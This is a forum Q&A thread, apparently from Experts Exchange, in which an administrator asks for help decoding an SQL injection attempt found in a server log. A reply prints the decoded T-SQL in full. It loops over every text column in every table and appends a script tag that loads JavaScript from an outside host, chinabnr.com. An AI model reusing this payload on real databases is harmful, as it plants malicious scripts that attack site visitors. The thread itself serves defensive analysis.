worthyking
asked on
SQL Injection (new?)
Recently we have seen a sharpincrease in the amount of attempted SQL injection hacks on our web servers. I found the below in the server log last night. this looks a lot more sophisticated than the sql injection hacks I have seen in the past. Can anyone translate this for me?
page_name.asp?zone=8&Refre
p.s. HT=http is the last actual URL parameter. After that the malformed URL begins.
page_name.asp?zone=8&Refre
p.s. HT=http is the last actual URL parameter. After that the malformed URL begins.
See http://dev.mysql.com/doc/refman/5.0/en/cast-functions.html
ASKER CERTIFIED SOLUTION
![Avatar of Guy Hengel [angelIII / a3]](https://filedb.experts-exchange.com/files/public/2013/11/25/ddbe0ea6-aa6e-4279-b781-57b735dd3ea0.jpeg){kind=small}
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
it sets all the values in all the columns to <script src=http://www.chinabnr.com/b.js></script>
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chinabnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
ASKER
Thanks! I should have tried that first, but I have not run into sql queries in binary before.
ASKER
Thanks all!
Geert_Gruwez: sorry, I had already accepted the solution before I refreshed and saw your post.
Geert_Gruwez: sorry, I had already accepted the solution before I refreshed and saw your post.
no problem, now i know that sql injection is possible too :)